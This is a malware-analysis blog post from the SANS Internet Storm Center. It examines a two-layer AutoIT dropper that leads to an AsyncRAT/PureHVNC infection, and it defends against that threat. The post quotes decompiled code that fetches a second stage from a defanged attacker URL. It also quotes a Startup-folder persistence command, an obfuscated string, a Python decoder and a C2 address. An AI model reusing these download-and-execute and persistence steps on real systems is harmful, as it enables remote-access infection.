Like .Net, AutoIT&#;x26;#;x5b;1&#;x26;#;x5d; remains a popular language for years in the malware ecosystem. It&#;x26;#;39;s a simple language that can interact with all the components of the Windows operating system. I regularly discover AutoIT3 binaries (yes, it can be compiled). This weekend, I found a malware delivered through a double layer of AutoIT code!
Like .Net, AutoIT[1] remains a popular language for years in the malware ecosystem. It’s a simple language that can interact with all the components of the Windows operating system. I regularly discover AutoIT3 binaries (yes, it can be compiled). This weekend, I found a malware delivered through a double layer of AutoIT code!
The initial file is an executable called “1. Project & Profit.exe” (SHA256:b5fbae9376db12a3fcbc99e83ccad97c87fb9e23370152d1452768a3676f5aeb). This is an AutoIT compiled script. Once decompiled, the code is simple and contains interesting strings:
Global $VY9A = "hxxps://xcvbsfq32e42313[.]xyz/OLpixJTrO" Global $ZX2B = "C:UsersPublicGuard.exe" Global $FW3N = "C:UsersPublicPublicProfile.ps1" $fU5L = ""hxxps://xcvbsfq32e42313[.]xyz/hYlXpuF.txt""" $oF6L = ""C:UsersPublicSecure.au3
It’s behaviour is simple: It will generate the PublicProfile.ps1 and execute it.
An AutoIT interpreter will be downloaded (and saved as “C:UsersPublicGuard.exe”) as well as another piece of AutoIT script (the second layer)
Persistence is achieved via a simple .url file placed in the Startup directory:
cmd /k echo [InternetShortcut] > "C:UsersadminAppDataRoamingMicrosoftWindowsStart MenuProgramsStartupSwiftWrite.url" & echo URL="C:UsersadminAppDataLocalWordGenius TechnologiesSwiftWrite.js" >> "C:UsersadminAppDataRoamingMicrosoftWindowsStart MenuProgramsStartupSwiftWrite.url" & exit
The JavaScript script will re-execute the AutoIT interpreter (“SwiftWrite.pif”) with its second script (“G”):
new ActiveXObject("Wscript.Shell").Run(""C:\Users\REM\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\REM\AppData\Local\WordGenius Technologies\G"")
Let’s have a look at “G”, the second layer of AutoIT code. This script is pretty well obfuscated. All strings are encoded using the Wales() function. Example:
If (Execute(Wales("80]114]111]99]101]115]115]69]120]105]115]116]115]40]39]97]118]97]115]116]117]105]46]101]120]101]39]41",0/2))) ...
The Wales function is simple, here is a Python version to help to decode all strings:
remnux@remnux:/MalwareZoo/20250518$ python3
Python 3.8.10 (default, Jun 22 2022, 20:18:18)
[GCC 9.4.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> def Wales(encoded: str, key: int) -> str:
... parts = [p for p in encoded.split("]") if p]
... decoded = ''.join(chr(int(num) - key) for num in parts)
... return decoded
...
>>> Wales("80]114]111]99]101]115]115]69]120]105]115]116]115]40]39]97]118]97]115]116]117]105]46]101]120]101]39]41",0)
"ProcessExists('avastui.exe')"
Finally, a “jsc.exe” process is spanwed and injected with the final malware as a DLL: Urshqbgpm.dll
I’m not sure about the final malware because it tried to connect to the C2 server 139[.]99[.]188[.]124 on port 56001. This one is associated to AsyncRAT.
But, in the DLL, we can find a lot of references to PureHVNC[2]:
[1] https://www.autoitscript.com/site/
[2] https://cyble.com/blog/pure-coder-offers-multiple-malware-for-sale-in-darkweb-forums/
Xavier Mertens (@xme)
Xameco
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Leave A Reply